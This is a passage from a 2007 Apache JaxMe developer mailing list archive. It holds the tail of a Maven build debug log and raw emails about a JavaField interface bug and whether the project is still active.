1.1) [DEBUG] org.codehaus.plexus:plexus-utils:jar:1.0.4:runtime (removed - nearer found: 1.1) [DEBUG] org.codehaus.plexus:plexus-container-default:jar:1.0-alpha-8:runtime (selected for runtime) [DEBUG] org.codehaus.plexus:plexus-utils:jar:1.0.4:runtime (removed - nearer found: 1.1) [DEBUG] junit:junit:jar:3.8.1:runtime (selected for runtime) [DEBUG] classworlds:classworlds:jar:1.1-alpha-2:runtime (selected for runtime) [DEBUG] org.apache.maven:maven-model:jar:2.0:runtime (selected for runtime) [DEBUG] org.codehaus.plexus:plexus-utils:jar:1.0.4:runtime (removed - nearer found: 1.1) [DEBUG] Adding managed dependencies for org.apache.maven:maven-artifact-manager [DEBUG] org.codehaus.plexus:plexus-container-default:jar:1.0-alpha-8 [DEBUG] org.codehaus.plexus:plexus-utils:jar:1.0.4 [DEBUG] org.apache.maven.wagon:wagon-provider-api:jar:1.0-alpha-5 [DEBUG] org.apache.maven.wagon:wagon-ssh:jar:1.0-alpha-5 [DEBUG] org.apache.maven.wagon:wagon-file:jar:1.0-alpha-5 [DEBUG] org.apache.maven.wagon:wagon-http-lightweight:jar:1.0-alpha-5 [DEBUG] org.apache.maven:maven-artifact-manager:jar:2.0:runtime (selected for runtime) [DEBUG] Adding managed dependencies for org.apache.maven:maven-repository-metadata [DEBUG] org.codehaus.plexus:plexus-container-default:jar:1.0-alpha-8 [DEBUG] org.codehaus.plexus:plexus-utils:jar:1.0.4 [DEBUG] org.apache.maven.wagon:wagon-provider-api:jar:1.0-alpha-5 [DEBUG] org.apache.maven.wagon:wagon-ssh:jar:1.0-alpha-5 [DEBUG] org.apache.maven.wagon:wagon-file:jar:1.0-alpha-5 [DEBUG] org.apache.maven.wagon:wagon-http-lightweight:jar:1.0-alpha-5 [DEBUG] org.apache.maven:maven-repository-metadata:jar:2.0:runtime (selected for runtime) [DEBUG] org.codehaus.plexus:plexus-utils:jar:1.0.4:runtime (removed - nearer found: 1.1) [DEBUG] org.codehaus.plexus:plexus-utils:jar:1.0.4:runtime (removed - nearer found: 1.1) [DEBUG] Adding managed dependencies for org.apache.maven:maven-artifact [DEBUG] org.codehaus.plexus:plexus-container-default:jar:1.0-alpha-8 [DEBUG] org.codehaus.plexus:plexus-utils:jar:1.0.4 [DEBUG] org.apache.maven.wagon:wagon-provider-api:jar:1.0-alpha-5 [DEBUG] org.apache.maven.wagon:wagon-ssh:jar:1.0-alpha-5 [DEBUG] org.apache.maven.wagon:wagon-file:jar:1.0-alpha-5 [DEBUG] org.apache.maven.wagon:wagon-http-lightweight:jar:1.0-alpha-5 [DEBUG] org.apache.maven:maven-artifact:jar:2.0:runtime (selected for runtime) [DEBUG] org.codehaus.plexus:plexus-utils:jar:1.0.4:runtime (removed - nearer found: 1.1) [DEBUG] org.apache.maven.wagon:wagon-provider-api:jar:1.0-alpha-5:runtime (selected for runtime) [DEBUG] org.codehaus.plexus:plexus-utils:jar:1.0.4:runtime (removed - nearer found: 1.1) [DEBUG] org.codehaus.plexus:plexus-utils:jar:1.0.4:runtime (removed - nearer found: 1.1) [DEBUG] org.apache.maven:maven-artifact:jar:2.0:runtime (selected for runtime) [DEBUG] org.codehaus.plexus:plexus-utils:jar:1.0.4:runtime (removed - nearer found: 1.1) [DEBUG] org.codehaus.plexus:plexus-container-default:jar:1.0-alpha-8:runtime (selected for runtime) [DEBUG] org.codehaus.plexus:plexus-utils:jar:1.0.4:runtime (removed - nearer found: 1.1) [DEBUG] junit:junit:jar:3.8.1:runtime (selected for runtime) [DEBUG] classworlds:classworlds:jar:1.1-alpha-2:runtime (selected for runtime) [DEBUG] Adding managed dependencies for org.apache.maven:maven-plugin-api [DEBUG] org.codehaus.plexus:plexus-container-default:jar:1.0-alpha-8 [DEBUG] org.codehaus.plexus:plexus-utils:jar:1.0.4 [DEBUG] org.apache.maven.wagon:wagon-provider-api:jar:1.0-alpha-5 [DEBUG] org.apache.maven.wagon:wagon-ssh:jar:1.0-alpha-5 [DEBUG] org.apache.maven.wagon:wagon-file:jar:1.0-alpha-5 [DEBUG] org.apache.maven.wagon:wagon-http-lightweight:jar:1.0-alpha-5 [DEBUG] org.apache.maven:maven-plugin-api:jar:2.0:runtime (selected for runtime) [DEBUG] Configuring mojo 'org.apache.ws.jaxme:maven-jaxme-plugin:1.0.3:jaxme' --> [DEBUG] (f) bindings =3D [Ljava.lang.String;@73a7ab [DEBUG] (f) classpathElements =3D [/home/jpollak/src/software/java/trunk/target/classes, /home/jpollak/.m2/re= pository/commons-math/commons-math/1.0/commons-math-1.0.jar, /home/jpollak/= .m2/repository/junit/junit/3.8.1/junit-3.8.1.jar, /home/jpollak/.m2/reposit= ory/commons-logging/commons-logging/1.1/commons-logging-1.1.jar, /home/jpol= lak/.m2/repository/javax/servlet/servlet-api/2.3/servlet-api-2.3.jar, /home= /jpollak/.m2/repository/commons-dbutils/commons-dbutils/1.1/commons-dbutils= -1.1.jar, /home/jpollak/.m2/repository/commons-discovery/commons-discovery/= 0.2/commons-discovery-0.2.jar, /home/jpollak/.m2/repository/commons-net/com= mons-net/1.3.0/commons-net-1.3.0.jar, /home/jpollak/.m2/repository/logkit/l= ogkit/1.0.1/logkit-1.0.1.jar, /home/jpollak/.m2/repository/com/jamonapi/jam= on/2.0/jamon-2.0.jar, /home/jpollak/.m2/repository/javax/mail/mail/1.3.3/ma= il-1.3.3.jar, /home/jpollak/.m2/repository/commons-collections/commons-coll= ections/3.1/commons-collections-3.1.jar, /home/jpollak/.m2/repository/avalo= n-framework/avalon-framework/4.1.3/avalon-framework-4.1.3.jar, /home/jpolla= k/.m2/repository/commons-dbcp/commons-dbcp/1.2.1/commons-dbcp-1.2.1.jar, /h= ome/jpollak/.m2/repository/oro/oro/2.0.8/oro-2.0.8.jar, /home/jpollak/.m2/r= epository/org/springframework/spring/2.0.2/spring-2.0.2.jar, /home/jpollak/= .m2/repository/xml-apis/xml-apis/1.0.b2/xml-apis-1.0.b2.jar, /home/jpollak/= .m2/repository/mysql/mysql-connector-java/3.1.12/mysql-connector-java-3.1.1= 2.jar, /home/jpollak/.m2/repository/xerces/xercesImpl/2.0.2/xercesImpl-2.0.= 2.jar, /home/jpollak/.m2/repository/jline/jline/0.9.9/jline-0.9.9.jar, /hom= e/jpollak/.m2/repository/log4j/log4j/1.2.14/log4j-1.2.14.jar, /home/jpollak= /.m2/repository/commons-pool/commons-pool/1.2/commons-pool-1.2.jar, /home/j= pollak/.m2/repository/javax/activation/activation/1.0.2/activation-1.0.2.ja= r] [DEBUG] (f) extension =3D false [DEBUG] (f) force =3D false [DEBUG] (f) project =3D org.apache.maven.project.MavenProject@bbdec290 [DEBUG] (f) readOnly =3D false [DEBUG] (f) removingOldOutput =3D false [DEBUG] (f) resourceTarget =3D /home/jpollak/src/software/java/trunk/target/jaxme/resources [DEBUG] (f) schemas =3D [Ljava.lang.String;@1c86be5 [DEBUG] (f) srcTarget =3D /home/jpollak/src/software/java/trunk/target/jaxme/java [DEBUG] (f) validating =3D false [DEBUG] -- end configuration -- [INFO] [jaxme:jaxme] [DEBUG] Using classpath file:/home/jpollak/src/software/java/trunk/target/classes/:file:/home/jpoll= ak/.m2/repository/commons-math/commons-math/1.0/commons-math-1.0.jar:file:/= home/jpollak/.m2/repository/junit/junit/3.8.1/junit-3.8.1.jar:file:/home/jp= ollak/.m2/repository/commons-logging/commons-logging/1.1/commons-logging-1.= 1.jar:file:/home/jpollak/.m2/repository/javax/servlet/servlet-api/2.3/servl= et-api-2.3.jar:file:/home/jpollak/.m2/repository/commons-dbutils/commons-db= utils/1.1/commons-dbutils-1.1.jar:file:/home/jpollak/.m2/repository/commons= -discovery/commons-discovery/0.2/commons-discovery-0.2.jar:file:/home/jpoll= ak/.m2/repository/commons-net/commons-net/1.3.0/commons-net-1.3.0.jar:file:= /home/jpollak/.m2/repository/logkit/logkit/1.0.1/logkit-1.0.1.jar:file:/hom= e/jpollak/.m2/repository/com/jamonapi/jamon/2.0/jamon-2.0.jar:file:/home/jp= ollak/.m2/repository/javax/mail/mail/1.3.3/mail-1.3.3.jar:file:/home/jpolla= k/.m2/repository/commons-collections/commons-collections/3.1/commons-collec= tions-3.1.jar:file:/home/jpollak/.m2/repository/avalon-framework/avalon-fra= mework/4.1.3/avalon-framework-4.1.3.jar:file:/home/jpollak/.m2/repository/c= ommons-dbcp/commons-dbcp/1.2.1/commons-dbcp-1.2.1.jar:file:/home/jpollak/.m= 2/repository/oro/oro/2.0.8/oro-2.0.8.jar:file:/home/jpollak/.m2/repository/= org/springframework/spring/2.0.2/spring-2.0.2.jar:file:/home/jpollak/.m2/re= pository/xml-apis/xml-apis/1.0.b2/xml-apis-1.0.b2.jar:file:/home/jpollak/.m= 2/repository/mysql/mysql-connector-java/3.1.12/mysql-connector-java-3.1.12.= jar:file:/home/jpollak/.m2/repository/xerces/xercesImpl/2.0.2/xercesImpl-2.= 0.2.jar:file:/home/jpollak/.m2/repository/jline/jline/0.9.9/jline-0.9.9.jar= :file:/home/jpollak/.m2/repository/log4j/log4j/1.2.14/log4j-1.2.14.jar:file= :/home/jpollak/.m2/repository/commons-pool/commons-pool/1.2/commons-pool-1.= 2.jar:file:/home/jpollak/.m2/repository/javax/activation/activation/1.0.2/a= ctivation-1.0.2.jar [DEBUG] No produced files found, disabling uptodate check. [DEBUG] Schema reader class: org.apache.ws.jaxme.generator.sg.impl.JAXBSchemaReader [DEBUG] org.apache.ws.jaxme.generator.impl.GeneratorImpl.generate(File): ->, /home/jpollak/src/software/java/trunk/datadefs/main.xsd [DEBUG] org.apache.ws.jaxme.generator.sg.impl.JAXBSchemaReader.parse: ->, file:/home/jpollak/src/software/java/trunk/datadefs/main.xsd [DEBUG] org.apache.ws.jaxme.generator.sg.impl.JAXBSchemaReader.getSGFactory: -> [DEBUG] org.apache.ws.jaxme.generator.sg.impl.JAXBSchemaReader.getSGFactory: Created instance of org.apache.ws.jaxme.generator.sg.impl.JAXBSGFactory [DEBUG] org.apache.ws.jaxme.generator.sg.impl.JAXBSchemaReader.getSGFactory: <-, org.apache.ws.jaxme.generator.sg.impl.SGFactoryImpl@79a2e7 [DEBUG] org.apache.ws.jaxme.generator.sg.impl.JAXBSchemaReader.parse: Parser =3D org.apache.ws.jaxme.xs.jaxb.impl.JAXBParser@472d48, validating =3D false [DEBUG] org.apache.ws.jaxme.generator.sg.impl.JAXBSchemaReader.parse: Schema =3D org.apache.ws.jaxme.xs.jaxb.impl.JAXBSchemaImpl@71dc3d [DEBUG] org.apache.ws.jaxme.generator.sg.impl.JAXBSchemaSG.init: -> [DEBUG] org.apache.ws.jaxme.generator.sg.impl.JAXBSchemaSG.init: <- [DEBUG] org.apache.ws.jaxme.generator.sg.impl.JAXBSchemaReader.parse: <-, org.apache.ws.jaxme.generator.sg.impl.SchemaSGImpl@17431b9 [DEBUG] org.apache.ws.jaxme.generator.impl.GeneratorImpl.generate(File): <-, org.apache.ws.jaxme.generator.sg.impl.SchemaSGImpl@17431b9 [DEBUG] Schema reader class: org.apache.ws.jaxme.generator.sg.impl.JAXBSchemaReader [DEBUG] org.apache.ws.jaxme.generator.impl.GeneratorImpl.generate(File): ->, /home/jpollak/src/software/java/trunk/datadefs/HybridFloor.xsd [DEBUG] org.apache.ws.jaxme.generator.sg.impl.JAXBSchemaReader.parse: ->, file:/home/jpollak/src/software/java/trunk/datadefs/HybridFloor.xsd [DEBUG] org.apache.ws.jaxme.generator.sg.impl.JAXBSchemaReader.getSGFactory: -> [DEBUG] org.apache.ws.jaxme.generator.sg.impl.JAXBSchemaReader.getSGFactory: Created instance of org.apache.ws.jaxme.generator.sg.impl.JAXBSGFactory [DEBUG] org.apache.ws.jaxme.generator.sg.impl.JAXBSchemaReader.getSGFactory: <-, org.apache.ws.jaxme.generator.sg.impl.SGFactoryImpl@16c79d7 [DEBUG] org.apache.ws.jaxme.generator.sg.impl.JAXBSchemaReader.parse: Parser =3D org.apache.ws.jaxme.xs.jaxb.impl.JAXBParser@b33d0a, validating =3D false [DEBUG] org.apache.ws.jaxme.generator.sg.impl.JAXBSchemaReader.parse: Schema =3D org.apache.ws.jaxme.xs.jaxb.impl.JAXBSchemaImpl@89cc5e [DEBUG] org.apache.ws.jaxme.generator.sg.impl.JAXBSchemaSG.init: -> [DEBUG] org.apache.ws.jaxme.generator.sg.impl.JAXBSchemaSG.init: <- [DEBUG] org.apache.ws.jaxme.generator.sg.impl.JAXBSchemaReader.parse: <-, org.apache.ws.jaxme.generator.sg.impl.SchemaSGImpl@c837cd [DEBUG] org.apache.ws.jaxme.generator.impl.GeneratorImpl.generate(File): <-, org.apache.ws.jaxme.generator.sg.impl.SchemaSGImpl@c837cd [INFO] ------------------------------------------------------------------------ [INFO] BUILD SUCCESSFUL [INFO] ------------------------------------------------------------------------ [INFO] Total time: 2 seconds [INFO] Finished at: Thu Aug 02 13:28:26 EDT 2007 [INFO] Final Memory: 4M/8M [INFO] ------------------------------------------------------------------------ --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Aug 15 15:02:40 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 9575 invoked from network); 15 Aug 2007 15:00:06 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 15 Aug 2007 15:00:06 -0000 Received: (qmail 1926 invoked by uid 500); 15 Aug 2007 15:00:04 -0000 Delivered-To: [email protected] Received: (qmail 1900 invoked by uid 500); 15 Aug 2007 15:00:04 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jaxme-dev.ws.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 1891 invoked by uid 99); 15 Aug 2007 15:00:04 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 15 Aug 2007 08:00:04 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO rv-out-0910.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 15 Aug 2007 15:00:02 +0000 Received: by rv-out-0910.google.com with SMTP id c24so1450035rvf for <[email protected]>; Wed, 15 Aug 2007 07:59:42 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:reply-to:sender:to:subject:mime-version:content-type:x-google-sender-auth; b=MQNcLGqFlTAsT6j6KcdADzaj+7NETz5X2RV2UPbm2r9mrJ5/ioLcD5fLKIg5eXqY1Osfk9iZN66zVZ8w0tBCDLR/XQo8TfRKPMiJVQH3XuKa/ucoRv3JIpMb72RX9M9xVV1odK/n/eLTJCaKZwYwc9dRNcxqRB4+IiDtM0Cl8wc= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:reply-to:sender:to:subject:mime-version:content-type:x-google-sender-auth; b=M0lYz95HGLeugefmX2m/qK9EaVpMvTfnIl2f4ceF1tYvTpqLtxAr+26lHxmPc7WQQmnTOtf9hWL7fDnEjgkVv6Zkz+ZXtRlLjjjNSckhZHyz6ugZDYc4Q8TOlHjCFd2WXREN9EWDnVX+NmvblK01NTUrwzgGbptpwDCyKNAWg3w= Received: by 161.129.204.104 with SMTP id g1mr610570wad.1187189980724; Wed, 15 Aug 2007 07:59:40 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Wed, 15 Aug 2007 07:59:40 -0700 (PDT) Message-ID: <[email protected]> Date: Wed, 15 Aug 2007 10:59:40 -0400 From: "Adam Lewis" <[email protected]> Reply-To: [email protected] Sender: [email protected] To: [email protected] Subject: JavaField in interfaces MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_177274_23750046.1187189980700" X-Google-Sender-Auth: f9e9c0c9a6d06ca8 X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_177274_23750046.1187189980700 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline Hi, I'm using JaxmeJS and am having trouble adding (static) fields to interfaces. It looks like the JavaField class can't handle interfaces. Specifically, in version 0.5.2, JavaField.java at line 82: if (pTarget.isInterface()) { return; } Shouldn't this be if (pTarget.isInterface() && !this.isStatic()) { return; } Thanks, Adam ------=_Part_177274_23750046.1187189980700 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline Hi,<br>&nbsp;&nbsp; I&#39;m using JaxmeJS and am having trouble adding (static) fields to interfaces.&nbsp; It looks like the JavaField class can&#39;t handle interfaces.&nbsp; Specifically, in version 0.5.2, JavaField.java at line 82:<br>&nbsp;&nbsp;&nbsp; <br>if (pTarget.isInterface()) {<br>&nbsp;&nbsp; return;<br>}<br><br>Shouldn&#39;t this be<br>&nbsp;&nbsp;&nbsp; if (pTarget.isInterface() &amp;&amp; !this.isStatic()) {<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; return;<br>&nbsp;&nbsp;&nbsp; }<br><br><br>Thanks,<br>Adam<br> ------=_Part_177274_23750046.1187189980700-- From [email protected] Wed Aug 15 15:09:56 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 37311 invoked from network); 15 Aug 2007 15:09:55 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 15 Aug 2007 15:09:55 -0000 Received: (qmail 19406 invoked by uid 500); 15 Aug 2007 15:09:53 -0000 Delivered-To: [email protected] Received: (qmail 19391 invoked by uid 500); 15 Aug 2007 15:09:53 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jaxme-dev.ws.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 19382 invoked by uid 99); 15 Aug 2007 15:09:53 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 15 Aug 2007 08:09:53 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO wa-out-1112.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 15 Aug 2007 15:09:50 +0000 Received: by wa-out-1112.google.com with SMTP id k22so2685797waf for <[email protected]>; Wed, 15 Aug 2007 08:09:30 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:reply-to:to:subject:mime-version:content-type; b=tJIJl4r5ksF1KBRr62eeGBeOMCBFVXFue7ixLGqBci2xric9OELJ+Q9pNOSSkB9kByzWV8bIQjmLYuVpWIwg3DEecxt94cpi/eHfsOUN0szoLJrilFeZKlt0a9ubLBXZ3+wRNZkSzRMnxoWW16L0KA7oBSb/yAd6RWJt7vwTjyc= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:reply-to:to:subject:mime-version:content-type; b=TAv/3S5YbSCoJ1wEQabwM7KLa8uoPUz/0Bs1zifJdJfMHLqWtlY848HTfJ2tiHCzRpu7odEMf+qt3E0n5eo9oEgj6Q8XyGp4zZYpl71RSOdJnaLbYkkvB0xvEIlLfjooQvN0bVJmqXx6mf5cnUKZ8zk+A5eVHBRCs5z+7YmXhYI= Received: by 161.129.204.104 with SMTP id i2mr635773wag.1187190570064; Wed, 15 Aug 2007 08:09:30 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Wed, 15 Aug 2007 08:09:30 -0700 (PDT) Message-ID: <[email protected]> Date: Wed, 15 Aug 2007 11:09:30 -0400 From: "Adam Lewis" <[email protected]> Reply-To: "Adam Lewis" <[email protected]> To: [email protected] Subject: JaxmeJS: JavaField in interfaces MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_177434_111758.1187190570019" X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_177434_111758.1187190570019 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline Hi, I'm using JaxmeJS and am having trouble adding (static) fields to interfaces. It looks like the JavaField class can't handle interfaces. Specifically, in version 0.5.2, JavaField.java at line 82: if (pTarget.isInterface()) { return; } Shouldn't this be if (pTarget.isInterface() && !this.isStatic()) { return; } Thanks, Adam ------=_Part_177434_111758.1187190570019 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline Hi,<br>&nbsp;&nbsp; I&#39;m using JaxmeJS and am having trouble adding (static) fields to interfaces.&nbsp; It looks like the JavaField class can&#39;t handle interfaces.&nbsp; Specifically, in version 0.5.2, JavaField.java at line 82:<br>&nbsp;&nbsp;&nbsp; <br>if (pTarget.isInterface()) {<br>&nbsp;&nbsp; return;<br>}<br><br>Shouldn&#39;t this be<br>&nbsp;&nbsp;&nbsp; if (pTarget.isInterface() &amp;&amp; !this.isStatic()) {<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; return;<br>&nbsp;&nbsp;&nbsp; }<br><br><br>Thanks,<br><span>Adam<br></span> ------=_Part_177434_111758.1187190570019-- From [email protected] Sat Aug 18 05:28:36 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 22222 invoked from network); 18 Aug 2007 05:28:35 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Aug 2007 05:28:35 -0000 Received: (qmail 96023 invoked by uid 500); 18 Aug 2007 05:28:33 -0000 Delivered-To: [email protected] Received: (qmail 96008 invoked by uid 500); 18 Aug 2007 05:28:32 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jaxme-dev.ws.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 95999 invoked by uid 99); 18 Aug 2007 05:28:32 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 17 Aug 2007 22:28:32 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO ik-out-1112.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 18 Aug 2007 05:28:31 +0000 Received: by ik-out-1112.google.com with SMTP id b35so136452ika for <[email protected]>; Fri, 17 Aug 2007 22:28:09 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:sender:to:subject:mime-version:content-type:x-google-sender-auth; b=cbOZGX/rp/vK0COJdQV+ER+gauDFL5WatYtY+IaIz6AMah6jygs4ddhwhN20IwtBS8lLEKiG0FsJGzS2VAUCnNDcmx1H/nCtmoHSILu6DjTfag0OAQuKLIJm2+CG8AcCFPwtepJmokNDyp7QC5LcONCmOJ0KvXWyJWaAY5tfdzY= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:sender:to:subject:mime-version:content-type:x-google-sender-auth; b=crVYzfDevfXxUpYrA9zQhlVsXT2TwtRgiFq0z8Un1N3/Pd7jdWnQ41wY7QBxKFr9sD1mmd3BcoYC2CoBjwjvGqKPURp09Vc5cPagsOBwGPktJXbtZ6aTHFeOzlO//fWH5GWQiHxEf/ujJFHm5QHuiqT1ur8SlNz7XdSt3YBbfIg= Received: by 161.129.204.104 with SMTP id m10mr2673901qbc.1187414888155; Fri, 17 Aug 2007 22:28:08 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Fri, 17 Aug 2007 22:28:08 -0700 (PDT) Message-ID: <[email protected]> Date: Sat, 18 Aug 2007 08:28:08 +0300 From: "Mohammad Nour El-Din" <[email protected]> Sender: [email protected] To: [email protected] Subject: Status of the project MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_82604_25228783.1187414888118" X-Google-Sender-Auth: adb99e3cc13d0539 X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_82604_25228783.1187414888118 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline Hi All... If you would please I would like to know the status of the project, the latest news on your site back to October-2006, but the dev list still have new messages till these days. The project still alive or not. And why people from OpenEJB and Geronimo use the sun RI of JAXB and not your implementation ? -- Thanks - Mohammad Nour ------=_Part_82604_25228783.1187414888118 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline Hi All...<br><br>&nbsp; If you would please I would like to know the status of the project, the latest news on your site back to October-2006, but the dev list still have new messages till these days. The project still alive or not. And why people from OpenEJB and Geronimo use the sun RI of JAXB and not your implementation ? <br clear="all"><br>-- <br>Thanks<br>- Mohammad Nour ------=_Part_82604_25228783.1187414888118-- From [email protected] Sun Aug 19 11:01:51 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 73971 invoked from network); 19 Aug 2007 11:01:50 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Aug 2007 11:01:50 -0000 Received: (qmail 55232 invoked by uid 500); 19 Aug 2007 11:01:47 -0000 Delivered-To: [email protected] Received: (qmail 55194 invoked by uid 500); 19 Aug 2007 11:01:47 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jaxme-dev.ws.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 55185 invoked by uid 99); 19 Aug 2007 11:01:47 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 19 Aug 2007 04:01:47 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO wr-out-0506.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 19 Aug 2007 11:01:46 +0000 Received: by wr-out-0506.google.com with SMTP id 76so623433wra for <[email protected]>; Sun, 19 Aug 2007 04:01:25 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=lTD7mgGx2Glp0qlZbH+D649w8T7Yax58NIRlUJRjSGaN4O8Ldxx9eVCLI0oUuxnfrVbvuowBSYgnLD+n71z3y+cQNf8pJ9qbXVBay2C8fUjrmvg8FMsN7Vcao7SnvZ650AhN5lycIwvEQMZYouZmlwIzNIYLUpgzAhzRzk0do3g= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=WBC2qtYJeAuW4MYH+rWq7QF3Z3WWR+QVptujGKjr+nlr3G428nR6Pu1caq6+rwHEJiTS7qw70zA/fMv9hkyyoOsMocbdhJcCevZTqGLFfY6wkhXk9bW+flBi2PMIbahVoMKEOGEA6XUsDD/fGDEsx8LXDE6xZF0Qhiia3d6J4oA= Received: by 161.129.204.104 with SMTP id g14mr7235076agb.1187521284872; Sun, 19 Aug 2007 04:01:24 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Sun, 19 Aug 2007 04:01:24 -0700 (PDT) Message-ID: <[email protected]> Date: Sun, 19 Aug 2007 14:01:24 +0300 From: "Mohammad Nour El-Din" <[email protected]> To: [email protected] Subject: Re: Status of the project In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_87807_1842513.1187521284819" References: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_87807_1842513.1187521284819 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline Hello is this list still active ? On 8/18/07, Mohammad Nour El-Din <[email protected]> wrote: > > Hi All... > > If you would please I would like to know the status of the project, the > latest news on your site back to October-2006, but the dev list still have > new messages till these days. The project still alive or not. And why people > from OpenEJB and Geronimo use the sun RI of JAXB and not your implementation > ? > > -- > Thanks > - Mohammad Nour -- Thanks - Mohammad Nour ------=_Part_87807_1842513.1187521284819 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline Hello is this list still active ?<br><br><div><span class="gmail_quote">On 8/18/07, <b class="gmail_sendername">Mohammad Nour El-Din</b> &lt;<a href="mailto:[email protected]">[email protected]</a>&gt; wrote:</span><blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;"> Hi All...<br><br>&nbsp; If you would please I would like to know the status of the project, the latest news on your site back to October-2006, but the dev list still have new messages till these days. The project still alive or not. And why people from OpenEJB and Geronimo use the sun RI of JAXB and not your implementation 